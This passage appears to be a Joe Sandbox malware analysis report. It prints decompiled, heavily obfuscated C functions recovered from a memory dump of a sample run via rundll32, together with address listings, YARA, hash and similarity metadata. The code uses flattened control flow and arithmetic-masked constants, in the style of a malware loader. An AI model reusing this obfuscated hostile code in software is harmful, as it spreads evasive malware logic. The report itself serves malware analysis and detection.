						if(_t216 == 0xb7209d2) {
							_t211 = E002ED25E(_t216);
							_t216 = 0x5ccdb59;
							continue;
						}
						if(_t216 != 0xeb2e9e3) {
							goto L8;
						}
						_t214 = E002E0AE0(0x10, 4);
						_push(_v12);
						_t250 = _t214;
						_push(_t239);
						_push(_t250);
						_push(1);
						E002D80E3(_v64, _v60);
						_t251 = _t251 + 0x18;
						_t242 = _t239 + _t250 * 2;
						_t216 = 0x80e5149;
						_t211 = 0x2e;
						 *_t242 = _t211;
						_t239 = _t242 + 2;
					}
					_t203 = E002E0AE0(0x10, 4);
					_push(_v24);
					_t249 = _t203;
					_push(_t239);
					_push(1);
					_push(2);
					E002D80E3(_v68, _v56);
					_push(_v72);
					_t240 = _t239 + 2;
					_push(_t240);
					_push(_t249);
					_push(1);
					E002D80E3(_v28, _v76);
					_t251 = _t251 + 0x28;
					_t241 = _t240 + _t249 * 2;
					_t216 = 0xeb2e9e3;
					_t206 = 0x5c;
					 *_t241 = _t206;
					_t239 = _t241 + 2;
					L8:
				} while (_t216 != 0x3f21c37);
				return _t211;
			}










































                                                                                                                                  0x002e8be9
                                                                                                                                  0x002e8bf9
                                                                                                                                  0x002e8bfa
                                                                                                                                  0x002e8c01
                                                                                                                                  0x002e8c04
                                                                                                                                  0x002e8c05
                                                                                                                                  0x002e8c06
                                                                                                                                  0x002e8c0c
                                                                                                                                  0x002e8c13
                                                                                                                                  0x002e8c16
                                                                                                                                  0x002e8c1d
                                                                                                                                  0x002e8c24
                                                                                                                                  0x002e8c2b
                                                                                                                                  0x002e8c32
                                                                                                                                  0x002e8c40
                                                                                                                                  0x002e8c47
                                                                                                                                  0x002e8c4a
                                                                                                                                  0x002e8c4d
                                                                                                                                  0x002e8c54
                                                                                                                                  0x002e8c5b
                                                                                                                                  0x002e8c69
                                                                                                                                  0x002e8c6c
                                                                                                                                  0x002e8c73
                                                                                                                                  0x002e8c7a
                                                                                                                                  0x002e8c81
                                                                                                                                  0x002e8c85
                                                                                                                                  0x002e8c8c
                                                                                                                                  0x002e8c93
                                                                                                                                  0x002e8c9a
                                                                                                                                  0x002e8c9e
                                                                                                                                  0x002e8ca5
                                                                                                                                  0x002e8cac
                                                                                                                                  0x002e8cb4
                                                                                                                                  0x002e8cb7
                                                                                                                                  0x002e8cba
                                                                                                                                  0x002e8cc1
                                                                                                                                  0x002e8ccf
                                                                                                                                  0x002e8cd2
                                                                                                                                  0x002e8cd9
                                                                                                                                  0x002e8ce0
                                                                                                                                  0x002e8ce7
                                                                                                                                  0x002e8cee
                                                                                                                                  0x002e8cf5
                                                                                                                                  0x002e8cff
                                                                                                                                  0x002e8d02
                                                                                                                                  0x002e8d05
                                                                                                                                  0x002e8d0c
                                                                                                                                  0x002e8d13
                                                                                                                                  0x002e8d17
                                                                                                                                  0x002e8d1e
                                                                                                                                  0x002e8d25
                                                                                                                                  0x002e8d2c
                                                                                                                                  0x002e8d33
                                                                                                                                  0x002e8d3a
                                                                                                                                  0x002e8d3e
                                                                                                                                  0x002e8d42
                                                                                                                                  0x002e8d49
                                                                                                                                  0x002e8d50
                                                                                                                                  0x002e8d57
                                                                                                                                  0x002e8d5b
                                                                                                                                  0x002e8d64
                                                                                                                                  0x002e8d6b
                                                                                                                                  0x002e8d78
                                                                                                                                  0x002e8d7b
                                                                                                                                  0x002e8d7e
                                                                                                                                  0x002e8d85
                                                                                                                                  0x002e8d93
                                                                                                                                  0x002e8d96
                                                                                                                                  0x002e8d9d
                                                                                                                                  0x002e8da4
                                                                                                                                  0x002e8dae
                                                                                                                                  0x002e8db1
                                                                                                                                  0x002e8db4
                                                                                                                                  0x002e8dbb
                                                                                                                                  0x002e8dc2
                                                                                                                                  0x002e8dc9
                                                                                                                                  0x002e8dd0
                                                                                                                                  0x002e8dd7
                                                                                                                                  0x002e8dde
                                                                                                                                  0x002e8de5
                                                                                                                                  0x002e8dec
                                                                                                                                  0x002e8df7
                                                                                                                                  0x002e8dfa
                                                                                                                                  0x002e8e01
                                                                                                                                  0x002e8e08
                                                                                                                                  0x002e8e0f
                                                                                                                                  0x002e8e16
                                                                                                                                  0x002e8e1a
                                                                                                                                  0x002e8e1e
                                                                                                                                  0x002e8e25
                                                                                                                                  0x002e8e25
                                                                                                                                  0x002e8e33
                                                                                                                                  0x002e8ef3
                                                                                                                                  0x002e8efc
                                                                                                                                  0x002e8efd
                                                                                                                                  0x002e8eff
                                                                                                                                  0x002e8f01
                                                                                                                                  0x002e8f0b
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8f0b
                                                                                                                                  0x002e8e3f
                                                                                                                                  0x002e8e8c
                                                                                                                                  0x002e8e91
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8e91
                                                                                                                                  0x002e8e47
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8e57
                                                                                                                                  0x002e8e5c
                                                                                                                                  0x002e8e62
                                                                                                                                  0x002e8e67
                                                                                                                                  0x002e8e68
                                                                                                                                  0x002e8e69
                                                                                                                                  0x002e8e6b
                                                                                                                                  0x002e8e70
                                                                                                                                  0x002e8e73
                                                                                                                                  0x002e8e76
                                                                                                                                  0x002e8e7d
                                                                                                                                  0x002e8e7e
                                                                                                                                  0x002e8e81
                                                                                                                                  0x002e8e81
                                                                                                                                  0x002e8ea2
                                                                                                                                  0x002e8ea7
                                                                                                                                  0x002e8ead
                                                                                                                                  0x002e8eb2
                                                                                                                                  0x002e8eb3
                                                                                                                                  0x002e8eb5
                                                                                                                                  0x002e8eb7
                                                                                                                                  0x002e8ebc
                                                                                                                                  0x002e8ec2
                                                                                                                                  0x002e8ec8
                                                                                                                                  0x002e8ec9
                                                                                                                                  0x002e8eca
                                                                                                                                  0x002e8ecc
                                                                                                                                  0x002e8ed1
                                                                                                                                  0x002e8ed4
                                                                                                                                  0x002e8ed7
                                                                                                                                  0x002e8ede
                                                                                                                                  0x002e8edf
                                                                                                                                  0x002e8ee2
                                                                                                                                  0x002e8ee5
                                                                                                                                  0x002e8ee5
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ulG$wV
                                                                                                                                  • API String ID: 0-391097709
                                                                                                                                  • Opcode ID: 7e8ef17572d72543039c8ab255bb4e6a29b84583741f6cafc19d4f3fda4ee57e
                                                                                                                                  • Instruction ID: d83f0751ae9371a7d7e3a90af0ff69b1af5c34294dcd105be090c5780c2f44d8
                                                                                                                                  • Opcode Fuzzy Hash: 7e8ef17572d72543039c8ab255bb4e6a29b84583741f6cafc19d4f3fda4ee57e
                                                                                                                                  • Instruction Fuzzy Hash: 94915572D01219EBDB14DFE5D88A9DEBBB1FF44314F248109E216B6250D7B01A46CF95
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D59F2 Relevance: 2.7, Strings: 2, Instructions: 202COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002D59F2() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				void* _t202;
				void* _t208;
				intOrPtr _t209;
				void* _t214;
				void* _t222;
				intOrPtr _t237;
				intOrPtr _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int* _t247;

				_t247 =  &_v1140;
				_v1056 = 0x36f622;
				_v1052 = 0x8ed67e;
				_t214 = 0xf737bb2;
				_v1048 = 0x93fb3c;
				_t240 = 0;
				_v1044 = 0;
				_v1076 = 0x48eb17;
				_v1076 = _v1076 + 0x189d;
				_v1076 = _v1076 ^ 0x00442401;
				_v1100 = 0xa45863;
				_v1100 = _v1100 << 2;
				_t241 = 0x1d;
				_v1100 = _v1100 * 0x7c;
				_v1100 = _v1100 ^ 0x3e6538f4;
				_v1108 = 0x56f1ad;
				_v1108 = _v1108 | 0xbff0a597;
				_v1108 = _v1108 / _t241;
				_v1108 = _v1108 ^ 0x06946226;
				_v1132 = 0xc3fd0a;
				_v1132 = _v1132 << 8;
				_v1132 = _v1132 + 0xffff9bc2;
				_t242 = 0x18;
				_v1132 = _v1132 / _t242;
				_v1132 = _v1132 ^ 0x0821d39f;
				_v1068 = 0xc66dea;
				_v1068 = _v1068 + 0xffff0514;
				_v1068 = _v1068 ^ 0x00c0919e;
				_v1136 = 0x72811d;
				_v1136 = _v1136 ^ 0x5ea2c622;
				_t243 = 0x5d;
				_v1136 = _v1136 * 0x4f;
				_v1136 = _v1136 * 0x41;
				_v1136 = _v1136 ^ 0xd3c4c324;
				_v1096 = 0x2e25e6;
				_v1096 = _v1096 ^ 0xbdbebaf9;
				_v1096 = _v1096 ^ 0xbd932287;
				_v1060 = 0x3d42d8;
				_v1060 = _v1060 << 6;
				_v1060 = _v1060 ^ 0x0f5887f2;
				_v1116 = 0xec9c1f;
				_v1116 = _v1116 >> 1;
				_v1116 = _v1116 + 0xcef9;
				_v1116 = _v1116 ^ 0x0078140d;
				_v1084 = 0xf6a299;
				_v1084 = _v1084 >> 9;
				_v1084 = _v1084 ^ 0x00023821;
				_v1124 = 0xf6e97d;
				_v1124 = _v1124 + 0xffff8c4c;
				_v1124 = _v1124 / _t243;
				_v1124 = _v1124 | 0xda1c672f;
				_v1124 = _v1124 ^ 0xda1e012d;
				_v1120 = 0x9bdb66;
				_v1120 = _v1120 * 0x47;
				_v1120 = _v1120 + 0xdb13;
				_v1120 = _v1120 * 0x64;
				_v1120 = _v1120 ^ 0xe2e3c71f;
				_v1112 = 0x9fec0e;
				_v1112 = _v1112 << 0xc;
				_v1112 = _v1112 | 0xd7512eb2;
				_v1112 = _v1112 ^ 0xffdc645c;
				_v1104 = 0xc74eee;
				_v1104 = _v1104 + 0x930c;
				_v1104 = _v1104 ^ 0x28280d38;
				_v1104 = _v1104 ^ 0x28ef0d26;
				_v1064 = 0xc36095;
				_v1064 = _v1064 | 0x2d8f7273;
				_v1064 = _v1064 ^ 0x2dcb1501;
				_v1140 = 0xa3c477;
				_v1140 = _v1140 ^ 0xb16da3ec;
				_v1140 = _v1140 ^ 0x8917fdcb;
				_v1140 = _v1140 >> 0xe;
				_v1140 = _v1140 ^ 0x000e0fa0;
				_v1128 = 0x58136;
				_v1128 = _v1128 << 6;
				_v1128 = _v1128 << 0x10;
				_v1128 = _v1128 + 0xffffe729;
				_v1128 = _v1128 ^ 0x4d79f308;
				_v1072 = 0x735c84;
				_t244 = 0x7f;
				_v1072 = _v1072 / _t244;
				_v1072 = _v1072 ^ 0x0002b970;
				_v1080 = 0x91f75b;
				_v1080 = _v1080 + 0xffffc39e;
				_v1080 = _v1080 ^ 0x009f463e;
				_v1088 = 0xdf4dcf;
				_v1088 = _v1088 | 0x05792173;
				_v1088 = _v1088 ^ 0x05f69aec;
				_v1092 = 0xf44447;
				_v1092 = _v1092 * 0x78;
				_v1092 = _v1092 ^ 0x728504a1;
				do {
					while(_t214 != 0x89b0ee) {
						if(_t214 == 0x291094f) {
							E002D3C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
						} else {
							if(_t214 == 0x6a25a64) {
								E002EDA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
								_t247 =  &(_t247[4]);
								_t214 = 0xe0c4196;
								continue;
							} else {
								if(_t214 == 0xe0c4196) {
									_push(_v1096);
									_push(_v1136);
									_t208 = E002EDCF7(_v1068, 0x2d1000, __eflags);
									_pop(_t222);
									_t209 =  *0x2f3e10; // 0x0
									_t237 =  *0x2f3e10; // 0x0
									E002D47CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
									E002DA8B0(_v1112, _t208, _v1104);
									_t247 =  &(_t247[9]);
									_t214 = 0x89b0ee;
									continue;
								} else {
									if(_t214 != 0xf737bb2) {
										goto L10;
									} else {
										_t214 = 0x6a25a64;
										continue;
									}
								}
							}
						}
						L13:
						return _t240;
					}
					_push(_v1128);
					_push( &_v1040);
					_push(_v1140);
					_t202 = E002F13AD(_v1064,  &_v520, __eflags);
					_t247 =  &(_t247[3]);
					__eflags = _t202;
					_t240 =  !=  ? 1 : _t240;
					_t214 = 0x291094f;
					L10:
					__eflags = _t214 - 0xb653a05;
				} while (__eflags != 0);
				goto L13;
			}










































                                                                                                                                  0x002d59f2
                                                                                                                                  0x002d59f8
                                                                                                                                  0x002d5a02
                                                                                                                                  0x002d5a0a
                                                                                                                                  0x002d5a0f
                                                                                                                                  0x002d5a1b
                                                                                                                                  0x002d5a1d
                                                                                                                                  0x002d5a21
                                                                                                                                  0x002d5a29
                                                                                                                                  0x002d5a31
                                                                                                                                  0x002d5a39
                                                                                                                                  0x002d5a41
                                                                                                                                  0x002d5a4d
                                                                                                                                  0x002d5a50
                                                                                                                                  0x002d5a54
                                                                                                                                  0x002d5a5c
                                                                                                                                  0x002d5a64
                                                                                                                                  0x002d5a74
                                                                                                                                  0x002d5a78
                                                                                                                                  0x002d5a80
                                                                                                                                  0x002d5a88
                                                                                                                                  0x002d5a8d
                                                                                                                                  0x002d5a99
                                                                                                                                  0x002d5a9e
                                                                                                                                  0x002d5aa4
                                                                                                                                  0x002d5aac
                                                                                                                                  0x002d5ab4
                                                                                                                                  0x002d5abc
                                                                                                                                  0x002d5ac4
                                                                                                                                  0x002d5acc
                                                                                                                                  0x002d5ad9
                                                                                                                                  0x002d5ada
                                                                                                                                  0x002d5ae3
                                                                                                                                  0x002d5ae7
                                                                                                                                  0x002d5aef
                                                                                                                                  0x002d5af7
                                                                                                                                  0x002d5aff
                                                                                                                                  0x002d5b07
                                                                                                                                  0x002d5b0f
                                                                                                                                  0x002d5b14
                                                                                                                                  0x002d5b1c
                                                                                                                                  0x002d5b24
                                                                                                                                  0x002d5b28
                                                                                                                                  0x002d5b30
                                                                                                                                  0x002d5b38
                                                                                                                                  0x002d5b40
                                                                                                                                  0x002d5b45
                                                                                                                                  0x002d5b4d
                                                                                                                                  0x002d5b55
                                                                                                                                  0x002d5b63
                                                                                                                                  0x002d5b67
                                                                                                                                  0x002d5b6f
                                                                                                                                  0x002d5b77
                                                                                                                                  0x002d5b84
                                                                                                                                  0x002d5b88
                                                                                                                                  0x002d5b95
                                                                                                                                  0x002d5b99
                                                                                                                                  0x002d5ba1
                                                                                                                                  0x002d5ba9
                                                                                                                                  0x002d5bae
                                                                                                                                  0x002d5bb6
                                                                                                                                  0x002d5bbe
                                                                                                                                  0x002d5bc8
                                                                                                                                  0x002d5bd5
                                                                                                                                  0x002d5be2
                                                                                                                                  0x002d5bea
                                                                                                                                  0x002d5bf2
                                                                                                                                  0x002d5bfa
                                                                                                                                  0x002d5c02
                                                                                                                                  0x002d5c0a
                                                                                                                                  0x002d5c12
                                                                                                                                  0x002d5c1a
                                                                                                                                  0x002d5c1f
                                                                                                                                  0x002d5c27
                                                                                                                                  0x002d5c2f
                                                                                                                                  0x002d5c34
                                                                                                                                  0x002d5c39
                                                                                                                                  0x002d5c41
                                                                                                                                  0x002d5c49
                                                                                                                                  0x002d5c57
                                                                                                                                  0x002d5c5a
                                                                                                                                  0x002d5c5e
                                                                                                                                  0x002d5c66
                                                                                                                                  0x002d5c6e
                                                                                                                                  0x002d5c76
                                                                                                                                  0x002d5c7e
                                                                                                                                  0x002d5c86
                                                                                                                                  0x002d5c8e
                                                                                                                                  0x002d5c96
                                                                                                                                  0x002d5ca3
                                                                                                                                  0x002d5ca7
                                                                                                                                  0x002d5caf
                                                                                                                                  0x002d5caf
                                                                                                                                  0x002d5cc1
                                                                                                                                  0x002d5dc8
                                                                                                                                  0x002d5cc7
                                                                                                                                  0x002d5cc9
                                                                                                                                  0x002d5d69
                                                                                                                                  0x002d5d6e
                                                                                                                                  0x002d5d71
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5ccf
                                                                                                                                  0x002d5cd1
                                                                                                                                  0x002d5ce3
                                                                                                                                  0x002d5cec
                                                                                                                                  0x002d5cf4
                                                                                                                                  0x002d5cfa
                                                                                                                                  0x002d5d05
                                                                                                                                  0x002d5d1c
                                                                                                                                  0x002d5d2f
                                                                                                                                  0x002d5d3e
                                                                                                                                  0x002d5d43
                                                                                                                                  0x002d5d46
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5cd3
                                                                                                                                  0x002d5cd9
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5cdf
                                                                                                                                  0x002d5cdf
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5cdf
                                                                                                                                  0x002d5cd9
                                                                                                                                  0x002d5cd1
                                                                                                                                  0x002d5cc9
                                                                                                                                  0x002d5dd0
                                                                                                                                  0x002d5ddc
                                                                                                                                  0x002d5ddc
                                                                                                                                  0x002d5d78
                                                                                                                                  0x002d5d80
                                                                                                                                  0x002d5d81
                                                                                                                                  0x002d5d90
                                                                                                                                  0x002d5d97
                                                                                                                                  0x002d5d9b
                                                                                                                                  0x002d5d9d
                                                                                                                                  0x002d5da0
                                                                                                                                  0x002d5da5
                                                                                                                                  0x002d5da5
                                                                                                                                  0x002d5da5
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: &($&(
                                                                                                                                  • API String ID: 0-3969885665
                                                                                                                                  • Opcode ID: 11f1de94f761288969a8db5887db5e790ac00a2b2252a61fa8d729cad849c648
                                                                                                                                  • Instruction ID: 322c0709215a2b7de78d34e47eab02f3a3671016ed3670343111c735c0605e63
                                                                                                                                  • Opcode Fuzzy Hash: 11f1de94f761288969a8db5887db5e790ac00a2b2252a61fa8d729cad849c648
                                                                                                                                  • Instruction Fuzzy Hash: 88A130B11183819FC758CF26C58941BFBF2FBC4758F108A1EF5A696220D7B58A19CF46
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D6D24 Relevance: 2.7, Strings: 2, Instructions: 164COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E002D6D24() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				short* _t158;
				void* _t161;
				void* _t164;
				intOrPtr _t173;
				intOrPtr _t188;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				void* _t198;

				_v556 = 0x5b9523;
				_v556 = _v556 ^ 0xd644881d;
				_t164 = 0xafec1cc;
				_v556 = _v556 ^ 0xd61fc18a;
				_v560 = 0xf0211a;
				_v560 = _v560 >> 0xc;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x000d86e8;
				_v536 = 0x5b86ee;
				_t192 = 0x7a;
				_v536 = _v536 / _t192;
				_v536 = _v536 ^ 0x00051f37;
				_v528 = 0x15dba1;
				_v528 = _v528 + 0xffff3226;
				_v528 = _v528 ^ 0x001c60e6;
				_v564 = 0xcdfacc;
				_v564 = _v564 ^ 0x78a7d3e3;
				_v564 = _v564 << 0xe;
				_v564 = _v564 ^ 0x8a48a6fd;
				_v572 = 0x7eccf1;
				_v572 = _v572 + 0xffffd1bc;
				_t193 = 0x2e;
				_v572 = _v572 * 0x26;
				_v572 = _v572 ^ 0x12c53124;
				_v588 = 0x8dc921;
				_v588 = _v588 | 0x53df5653;
				_v588 = _v588 << 7;
				_v588 = _v588 * 0x73;
				_v588 = _v588 ^ 0xc8beb34e;
				_v544 = 0xe1fa74;
				_v544 = _v544 + 0xffffe6ac;
				_v544 = _v544 ^ 0x00e0f2b8;
				_v568 = 0x925246;
				_v568 = _v568 + 0xffffcd65;
				_v568 = _v568 + 0xffffdee0;
				_v568 = _v568 ^ 0x009eae97;
				_v576 = 0x3c09b4;
				_v576 = _v576 + 0xffff2c4c;
				_v576 = _v576 >> 0xa;
				_v576 = _v576 ^ 0x000cc2c3;
				_v592 = 0xac7846;
				_v592 = _v592 ^ 0xbb2572b9;
				_v592 = _v592 ^ 0xeb3265e6;
				_v592 = _v592 | 0x6a541c4b;
				_v592 = _v592 ^ 0x7af30806;
				_v548 = 0xb1a24a;
				_v548 = _v548 / _t193;
				_v548 = _v548 ^ 0x00094ccb;
				_v552 = 0xbe5b93;
				_v552 = _v552 | 0xe01e3375;
				_v552 = _v552 ^ 0xe0b0d42a;
				_v532 = 0x76dce5;
				_t194 = 0x19;
				_v532 = _v532 / _t194;
				_v532 = _v532 ^ 0x00002403;
				_v584 = 0xffb3b0;
				_v584 = _v584 << 0xc;
				_v584 = _v584 ^ 0x8b2427a7;
				_v584 = _v584 | 0x0ff5fda2;
				_v584 = _v584 ^ 0x7ffdbf2b;
				_v580 = 0x6f9ecd;
				_t195 = 0x5b;
				_v580 = _v580 / _t195;
				_v580 = _v580 << 0xc;
				_v580 = _v580 ^ 0x13a22276;
				_v540 = 0xd8d341;
				_v540 = _v540 * 0xb;
				_v540 = _v540 ^ 0x095c7847;
				do {
					while(_t164 != 0x2dc4ff7) {
						if(_t164 == 0x5cfc1e4) {
							return E002D9DCF(_v532, _v584, _v580,  &_v524,  &_v524, E002D4EE3, _v540, 0);
						}
						if(_t164 == 0x9efe9dd) {
							_push(_v536);
							_push(_v560);
							_t161 = E002EDCF7(_v556, 0x2d1000, __eflags);
							_t173 =  *0x2f3e10; // 0x0
							_t188 =  *0x2f3e10; // 0x0
							E002D47CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
							_t158 = E002DA8B0(_v568, _t161, _v576);
							_t198 = _t198 + 0x24;
							_t164 = 0x2dc4ff7;
							continue;
						}
						if(_t164 != 0xafec1cc) {
							goto L8;
						}
						_t164 = 0x9efe9dd;
					}
					_t158 = E002DB6CF( &_v524, _v592, _v548, _v552);
					__eflags = 0;
					 *_t158 = 0;
					_t164 = 0x5cfc1e4;
					L8:
					__eflags = _t164 - 0xdc02af8;
				} while (__eflags != 0);
				return _t158;
			}































                                                                                                                                  0x002d6d2a
                                                                                                                                  0x002d6d34
                                                                                                                                  0x002d6d3c
                                                                                                                                  0x002d6d41
                                                                                                                                  0x002d6d49
                                                                                                                                  0x002d6d51
                                                                                                                                  0x002d6d56
                                                                                                                                  0x002d6d5b
                                                                                                                                  0x002d6d63
                                                                                                                                  0x002d6d75
                                                                                                                                  0x002d6d7a
                                                                                                                                  0x002d6d80
                                                                                                                                  0x002d6d88
                                                                                                                                  0x002d6d90
                                                                                                                                  0x002d6d98
                                                                                                                                  0x002d6da0
                                                                                                                                  0x002d6da8
                                                                                                                                  0x002d6db0
                                                                                                                                  0x002d6db5
                                                                                                                                  0x002d6dbd
                                                                                                                                  0x002d6dc5
                                                                                                                                  0x002d6dd2
                                                                                                                                  0x002d6dd5
                                                                                                                                  0x002d6dd9
                                                                                                                                  0x002d6de1
                                                                                                                                  0x002d6de9
                                                                                                                                  0x002d6df1
                                                                                                                                  0x002d6dfb
                                                                                                                                  0x002d6dff
                                                                                                                                  0x002d6e07
                                                                                                                                  0x002d6e0f
                                                                                                                                  0x002d6e17
                                                                                                                                  0x002d6e1f
                                                                                                                                  0x002d6e27
                                                                                                                                  0x002d6e2f
                                                                                                                                  0x002d6e37
                                                                                                                                  0x002d6e3f
                                                                                                                                  0x002d6e47
                                                                                                                                  0x002d6e4f
                                                                                                                                  0x002d6e54
                                                                                                                                  0x002d6e5c
                                                                                                                                  0x002d6e64
                                                                                                                                  0x002d6e6c
                                                                                                                                  0x002d6e74
                                                                                                                                  0x002d6e7c
                                                                                                                                  0x002d6e84
                                                                                                                                  0x002d6e94
                                                                                                                                  0x002d6e98
                                                                                                                                  0x002d6ea0
                                                                                                                                  0x002d6ea8
                                                                                                                                  0x002d6eb0
                                                                                                                                  0x002d6eb8
                                                                                                                                  0x002d6ec4
                                                                                                                                  0x002d6ec7
                                                                                                                                  0x002d6ecb
                                                                                                                                  0x002d6ed3
                                                                                                                                  0x002d6edb
                                                                                                                                  0x002d6ee0
                                                                                                                                  0x002d6ee8
                                                                                                                                  0x002d6ef0
                                                                                                                                  0x002d6efa
                                                                                                                                  0x002d6f08
                                                                                                                                  0x002d6f15
                                                                                                                                  0x002d6f1e
                                                                                                                                  0x002d6f23
                                                                                                                                  0x002d6f2b
                                                                                                                                  0x002d6f38
                                                                                                                                  0x002d6f3c
                                                                                                                                  0x002d6f44
                                                                                                                                  0x002d6f44
                                                                                                                                  0x002d6f4e
                                                                                                                                  0x00000000
                                                                                                                                  0x002d701e
                                                                                                                                  0x002d6f56
                                                                                                                                  0x002d6f68
                                                                                                                                  0x002d6f71
                                                                                                                                  0x002d6f79
                                                                                                                                  0x002d6f8a
                                                                                                                                  0x002d6fa2
                                                                                                                                  0x002d6fb2
                                                                                                                                  0x002d6fc1
                                                                                                                                  0x002d6fc6
                                                                                                                                  0x002d6fc9
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6fc9
                                                                                                                                  0x002d6f5e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6f64
                                                                                                                                  0x002d6f64
                                                                                                                                  0x002d6fe0
                                                                                                                                  0x002d6fe7
                                                                                                                                  0x002d6fe9
                                                                                                                                  0x002d6fec
                                                                                                                                  0x002d6fee
                                                                                                                                  0x002d6fee
                                                                                                                                  0x002d6fee
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Gx\$e2
                                                                                                                                  • API String ID: 0-3912940318
                                                                                                                                  • Opcode ID: 0abe0ed10546ef6adb9caac49fe2e53893b6ef36bf90669511eca014793ec1a4
                                                                                                                                  • Instruction ID: d4a12b829eb8e093a3bdbbe40d22cea961385a580fef0d3a6da19219bc68b3a3
                                                                                                                                  • Opcode Fuzzy Hash: 0abe0ed10546ef6adb9caac49fe2e53893b6ef36bf90669511eca014793ec1a4
                                                                                                                                  • Instruction Fuzzy Hash: 2D7141711183419FC368CF21D88A81FBBF1FBC4758F209A1DF69696260D3B19A59CF86
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DA55F Relevance: 2.7, Strings: 2, Instructions: 159COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E002DA55F() {
				char _v520;
				signed int _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _t161;
				char* _t162;
				intOrPtr _t164;
				void* _t168;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				short* _t195;
				signed int* _t197;

				_t197 =  &_v584;
				_v528 = _v528 & 0x00000000;
				_v524 = _v524 & 0x00000000;
				_t168 = 0xe71c2f1;
				_v532 = 0xa0346f;
				_v560 = 0x45ed96;
				_t187 = 0x29;
				_v560 = _v560 / _t187;
				_t189 = 0x5d;
				_v560 = _v560 * 0x5e;
				_v560 = _v560 ^ 0x00ac5e2c;
				_v568 = 0x587b3f;
				_v568 = _v568 >> 1;
				_v568 = _v568 >> 6;
				_v568 = _v568 + 0x3200;
